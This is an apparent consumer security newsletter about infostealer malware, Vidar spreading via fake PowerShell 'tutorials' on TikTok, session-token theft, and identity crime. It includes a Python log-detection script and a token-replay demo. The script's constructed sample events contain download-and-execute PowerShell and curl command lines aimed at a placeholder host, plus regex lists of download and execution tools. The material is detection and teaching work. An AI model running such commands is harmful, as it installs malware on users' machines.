Daylila

Cybersecurity · Thursday, 11 June 2026

01 · Briefing · what happened

Quiet malware copied passwords off 11 million machines — and the thefts left no gap to notice

Cybersecurity 4 min 38 sources

Cheap infostealer malware harvested passwords and login sessions from 11.1 million devices in 2025, and one stolen credential now spreads into several crimes at once.

Key takeaways

  • Cheap malware copied passwords and login sessions from 11.1 million devices in 2025; over 3.3 billion stolen credentials now circulate, and a stolen session token lets an attacker skip even your two-step check.
  • One strain, Vidar, spread through fake "free software" tutorials on TikTok that talked people into running it themselves — no hacking required.
  • A quarter of identity-crime victims now face several crimes at once, because one stolen secret can be copied and reused everywhere; passkeys and logging out shut that door.

The biggest security story this week isn’t a single break-in. It’s a quiet, industrial-scale theft of the small secrets that let you skip the lock — and a growing pile of evidence that once one is taken, the trouble doesn’t stay in one place.

The 3.3 billion stolen keys nobody noticed leaving

Security firm Flashpoint counted more than 11.1 million devices infected in 2025 by a kind of malware called an infostealer — a quiet program that copies what’s already on your machine: saved passwords, browser data, and login tokens, then sends it to the attacker [8]. The haul: over 3.3 billion credentials, browser artifacts, and session details now circulating in criminal marketplaces [8].

Here’s the part worth understanding. A session token is the small piece of data, usually a cookie, that your browser keeps after you log in, so you’re not asked for your password on every click. It is proof you already passed the check, including the second step, the code from your phone. Steal the token and you don’t need the password or the code; the site treats you as the already-approved user until the token expires or you log out. As one tally put it, attackers now prefer this route because it’s “quicker, easier, less visible” than forcing a way in [8].

These tools are cheap. Infostealers rent on the underground market for as little as $60 a month [8]. In early 2026 one strain, Vidar, jumped from fourth place to dominate — more than 73% of infected hosts [8].

How Vidar got onto Windows PCs: a free-Spotify tutorial

The way Vidar spread this year is almost mundane. Researchers at ReversingLabs found short videos on TikTok and Instagram Reels, dressed up as tutorials for unlocking premium software free [11]. An AI-voiced clip walked viewers through opening PowerShell — a built-in Windows command tool — and pasting in a line of text [11].

That line quietly downloaded and ran Vidar from a lookalike web address, msget[.]run, which some mistook for a Microsoft one [11]. The fake accounts mimicked the official Windows profile, crown icon and all, and chased saves and shares to climb the recommendation feed; one clip drew over 100,000 views and nearly 1,700 saves [11]. No flaw was exploited. The viewer was persuaded to run the program themselves.

If you ever see a video telling you to paste a command into PowerShell or Terminal to “unlock” or “fix” something, that is the attack. Don’t.
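The line those videos ask viewers to paste has a recognisable shape, and an endpoint team can hunt for it in process-creation logs. The script below is an added example, not tooling from the article, from ReversingLabs or from Microsoft: it scores Windows process-creation events (the command line and parent process that Sysmon Event ID 1 or Windows event 4688 record) for the download-then-run pattern, decoding PowerShell’s base64 -EncodedCommand form so the same checks apply to it. The sample events are constructed for the demo, the indicator names are mine, and example.invalid stands in for any real host rather than the address named above.

```python
"""Spotting the 'paste this into PowerShell' pattern in process logs.

Added example for the Vidar story; not code from the article, from
ReversingLabs or from Microsoft. Input events are constructed below in the
shape of a process-creation log (command line plus parent process).
"""
import base64
import re

# One regex per indicator. Case-insensitive because PowerShell is, and because
# attackers mix case to dodge naive string matches.
INDICATORS = {
    "download": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|curl|wget|downloadstring|"
        r"downloadfile|net\.webclient|bitsadmin|start-bitstransfer)\b", re.I),
    "execute": re.compile(
        r"\b(iex|invoke-expression|start-process|mshta|rundll32|regsvr32)\b"
        r"|&&\s*\S*\.(exe|bat|cmd|msi)\b", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass\b", re.I),
}
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# A shell whose parent is the desktop was opened by hand, as the video instructs.
USER_SHELL_PARENTS = {"explorer.exe", "windowsterminal.exe"}


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return the decoded
    script (or '') so the indicators can be matched against it too."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(event):
    """Return (suspicious, sorted indicator names) for one event."""
    cmdline = event["cmdline"]
    text = cmdline + " " + decode_encoded_command(cmdline)
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if ENCODED.search(cmdline):
        hits.add("encoded")
    if event.get("parent", "").lower() in USER_SHELL_PARENTS:
        hits.add("launched_from_desktop")
    # Download followed by execution is the core of the lure; a hidden,
    # policy-bypassing window is the other giveaway. Encoding alone is common
    # in legitimate admin scripts, so it only counts next to a download.
    suspicious = ({"download", "execute"} <= hits
                  or {"hidden", "bypass"} <= hits
                  or {"encoded", "download"} <= hits)
    return suspicious, sorted(hits)


def triage(events):
    """Return the events worth a human look, with the indicators that fired."""
    flagged = []
    for ev in events:
        suspicious, hits = classify(ev)
        if suspicious:
            flagged.append({"cmdline": ev["cmdline"],
                            "parent": ev.get("parent"), "indicators": hits})
    return flagged


# Constructed sample events; example.invalid is a placeholder host.
_ENC = base64.b64encode("iex (irm http://example.invalid/s)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline":
        'powershell.exe -w hidden -ep bypass -c "iex (iwr -useb http://example.invalid/get)"'},
    {"parent": "explorer.exe", "cmdline": f"powershell.exe -NoProfile -enc {_ENC}"},
    {"parent": "explorer.exe", "cmdline":
        "cmd.exe /c curl -s http://example.invalid/a.txt -o %TEMP%\\a.exe && %TEMP%\\a.exe"},
    {"parent": "code.exe", "cmdline": "powershell.exe -NoProfile -File .\\build.ps1"},
    {"parent": "explorer.exe", "cmdline":
        'powershell.exe -c "Get-Process | Sort-Object CPU -Descending"'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["indicators"], "<-", hit["cmdline"][:70])
```

The last two sample events are the point of the scoring rule: an admin opening PowerShell from the Start menu, or an editor running a build script, must not page anyone. Tune the indicator lists to your own logs before alerting on them, and treat a hit with `launched_from_desktop` plus a download as the one to call the user about.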

One theft, several crimes

What makes this year’s numbers different is what happens after the credential is taken. The US Identity Theft Resource Center, a non-profit that helps victims, analysed over 6,000 reports and found nearly 26% of victims dealt with two or more identity crimes at once — up from 24% a year earlier [16].

The center’s chief programs officer, Mona Terry, named the shift plainly: “A single compromise can trigger a chain reaction that spreads across multiple accounts and institutions” [16]. Account takeovers were half of all misuse cases; unauthorized access to a device or PC jumped 78% in a year and is now the top threat for adults aged 35 to 64 [16]. Recovery is brutal once money is lost — only 9% of victims who lost money reached a resolution, against 53% of those who didn’t [16].

The reason one stolen secret becomes five crimes is worth dwelling on — the lesson takes it apart.

What to do, in order

If you can do one thing: turn on a passkey where it’s offered (banks, email, Apple, Google, Microsoft), or failing that a code from an authenticator app. A passkey can’t be copied off your machine the way a saved password can: its secret half stays locked to the device and to your fingerprint or face, and it only answers the site it was created for, so a look-alike login page gets nothing. One caveat: a passkey protects the act of logging in, not the session that follows, which is why the next step matters.

Then: stop saving passwords in the browser for anything that holds money or identity, and log out of sensitive sites when you’re done — that ends the session token an infostealer would grab. If an account was ever exposed, change that password everywhere you reused it; reuse is how one breach becomes several.

The rest of the week, briefly

South Korea fined Coupang a record $400m — the country’s largest data-breach penalty ever — over a leak exposing the data of about 37.5 million users, more than half the population [1]. Regulators found poor management of authentication keys and access controls; Coupang plans to appeal [1].

Microsoft patched a record 206 flaws, including three “zero-days” — flaws attackers were already using before any fix existed — and a separate Windows zero-day exploit nicknamed RoguePlanet was released publicly [3][5]. If your Windows updates are set to automatic, the patched flaws are handled for you; if not, install the updates now.

The US tightened its patching clock. A new directive from CISA, the federal cyber-defence agency, orders government agencies to fix actively-exploited flaws in as little as three days, down from longer windows, citing how fast attackers now move [7][17]. It applies to agencies, but the logic holds for you too: the gap between “fix exists” and “you installed it” is the window attackers live in.

Researchers also flagged critical flaws in data-center cooling and backup-power systems that could let attackers disrupt the buildings the internet runs on — a reminder that the soft spot is often the boring equipment nobody watches [12].

02 · Lesson · why it matters

The thing that's still yours after it's stolen

Steal a physical key and the owner notices a gap. Steal a password and nothing is missing — which is exactly why one theft quietly becomes many.

A theft that leaves the shelf full

Picture a burglar who takes your house key. You’d know by morning. The hook by the door is empty; the gap tells you. That gap is the whole reason theft has always been self-limiting — the thief gets the key, and you lose it, and now there is one key in one pair of hands.

A stolen password works nothing like that. When an infostealer — the cheap malware that copies what’s already on your computer — lifts your saved login, your copy stays exactly where it was. You log in tomorrow as normal. Nothing on your screen is missing. The shelf is still full. And yet the same secret is now sitting in a criminal marketplace, available to anyone who pays, doing the same job in a thousand other hands at once [8].

This is the quiet fact under this week’s numbers. Eleven million devices copied in a single year. Over three billion credentials in circulation [8]. None of those copies emptied a hook. That’s why nobody noticed.

Some things lose nothing by being shared

There’s a name for the property that makes a password different from a key. Economists call goods like a sandwich rivalrous — if I eat it, you can’t. A key is rivalrous. A seat on a train is rivalrous. Most of the things we’ve built our instincts around are rivalrous, so our sense of “stolen” carries a built-in comfort: if they have it, I don’t, and at least I’ll know.

Information is not rivalrous. A number, a phrase, a file — copying it costs almost nothing and takes nothing from the original. This is wonderful when you want to share a recipe or a song. It is the exact same property that makes a stolen credential so dangerous. The secret that protects your bank account is, mechanically, just a string of characters. It can be in your password manager and on a hacker’s hard drive and in fifty other buyers’ tools, all at the same moment, all fully working.

Your defenses were built for the rivalrous world. “Did anyone take my key?” is answerable. “Is my password also somewhere else right now?” usually isn’t.

Why one theft becomes five crimes

Now the chain reaction makes sense. The Identity Theft Resource Center found that a quarter of victims now face two or more identity crimes at the same time, and named why: one compromise “can trigger a chain reaction that spreads across multiple accounts and institutions” [16].

It spreads because the stolen thing copies freely. A single password, reused across your email and your shopping and your bank, isn’t one lock — it’s the same lock fitted to five doors, and the copied key opens all of them. A stolen session token — the small proof-of-login your browser keeps so it won’t ask for your password every click — is worse still: it’s a key that has already passed the guard, including the code from your phone, so it walks the copier straight past the check you thought protected you [8]. None of this requires breaking anything. It requires copying one thing that was never diminished by being copied.
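The session-token mechanics described in the briefing and again here, as an added example that is not the article’s own code and not any named site’s implementation: a toy login service in Python. The SessionStore class, the demo account, the second-factor code and the client fingerprints are all assumptions made for the illustration; the “infostealer” is simulated by copying the token string, which is all a real one does.

```python
"""A stolen session token walks past the second factor; logout ends it.

Added example, not code from the article or from any site it names. An
in-memory SessionStore stands in for a web app's login service.
"""
import hashlib
import hmac
import secrets
import time

# Constructed demo account: a password plus the current code from an app.
USERS = {"alice": {"password": "correct horse", "code": "123456"}}


class SessionStore:
    """Sessions as a real server keeps them: keyed by a hash of the token,
    with an expiry and the client fingerprint seen at login."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self.sessions = {}

    @staticmethod
    def _key(token):
        # Store only a hash, so a dump of this table is not itself a set of
        # working tokens. The browser's cookie jar holds the raw token, which
        # is exactly what an infostealer copies.
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, user, password, code, client_fp):
        """The full check: password and second factor. Returns a fresh token
        or None. A passkey login would mint the same kind of token."""
        rec = USERS.get(user)
        if rec is None:
            return None
        if not (hmac.compare_digest(rec["password"], password)
                and hmac.compare_digest(rec["code"], code)):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[self._key(token)] = {
            "user": user, "expires": time.time() + self.ttl, "fp": client_fp}
        return token

    def whoami(self, token, client_fp, bind_to_client=False):
        """What every later request does: no password, no code, just the
        token. With bind_to_client the server also insists the request
        looks like the browser that logged in."""
        rec = self.sessions.get(self._key(token))
        if rec is None or rec["expires"] < time.time():
            return None
        if bind_to_client and not hmac.compare_digest(rec["fp"], client_fp):
            return None
        return rec["user"]

    def logout(self, token):
        """Server-side revocation: every copy of the token dies at once."""
        return self.sessions.pop(self._key(token), None) is not None


def demo():
    """Run the theft end to end and return what each party could do."""
    store = SessionStore()
    victim_fp = "Windows/Chrome/203.0.113.10"    # constructed
    attacker_fp = "Linux/Firefox/198.51.100.7"   # constructed
    token = store.login("alice", "correct horse", "123456", victim_fp)
    stolen = token        # the infostealer's copy; alice's copy is unchanged
    out = {}
    out["victim"] = store.whoami(token, victim_fp)
    # Replay from another machine is accepted: the token already passed MFA.
    out["attacker_replay"] = store.whoami(stolen, attacker_fp)
    # A fresh login without the code would have failed.
    out["attacker_without_code"] = store.login("alice", "correct horse", "000000", attacker_fp)
    # Binding the session to the login-time client raises the bar ...
    out["attacker_bound"] = store.whoami(stolen, attacker_fp, bind_to_client=True)
    # ... and logging out kills both copies, which is the briefing's advice.
    store.logout(token)
    out["attacker_after_logout"] = store.whoami(stolen, attacker_fp)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>22}: {result}")
```

The fingerprint check is the weak kind of binding: an attacker who already runs code on the victim’s machine can route traffic through it and copy its user-agent. Short lifetimes help more, and browser vendors are now working on sessions bound to a key held in the device’s security chip, which cannot be copied out with the cookie. The control the reader already has is the last line of the demo: logging out runs `logout` on the server, and every copy, stolen or not, stops working.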

The trick is to persuade you, not to break in

Notice what the attackers spent their effort on. Not picking a lock, but getting you to hand over the copy. Vidar spread this year through fake “free Spotify” tutorials on TikTok, an AI voice walking viewers through pasting a command so that they installed the malware themselves [11]. No flaw was exploited. The strongest part of your security, the part that asks “are you sure?”, was simply talked around.

That’s the shape of it once the valuable thing is copyable: the contest stops being about strength and becomes about persuasion and reach. A cheap copy, spread to a hundred thousand viewers, only needs to work on a few [11]. The economics flip entirely from the burglar’s. He could rob one house a night. A copied credential robs at the speed of a download.

What you’re actually inside

Here’s the part that’s easy to miss from your own chair. You feel like the owner of your passwords — they’re yours, in your manager, behind your face-scan. But in a world of copyable secrets, “yours” doesn’t mean “only yours.” The same property that lets you sync your logins across your phone and laptop is the property that lets a thief run them in parallel with you, unseen.

And you are not standing outside this. Every person who reuses a password, saves a card in a browser, or stays logged in is holding a copyable key, and the system treats every copy as the real owner, because it cannot tell them apart. The reason the better tools work is that they break the copy. A passkey’s secret half stays welded to your device and your fingerprint, and it only answers the site it was made for; lift what you can see and it’s useless elsewhere [16]. Logging out revokes the session token on the server, so any copy already taken stops working.

The honest version of the lesson is small and a little humbling. The locks you trusted were built for a world where stealing something meant the owner lost it. Most of what’s worth protecting about you now is the kind of thing that can be taken without ever leaving — which means the only safe assumption is that a copy already could be out there, and the question worth asking is not “did I lose it?” but “can it still be copied at all?”

03 · Lab · your turn

The Copy Test

Rehearse which secrets survive a device theft because they can't be copied, and feel why one copyable password becomes many crimes.

Across the beats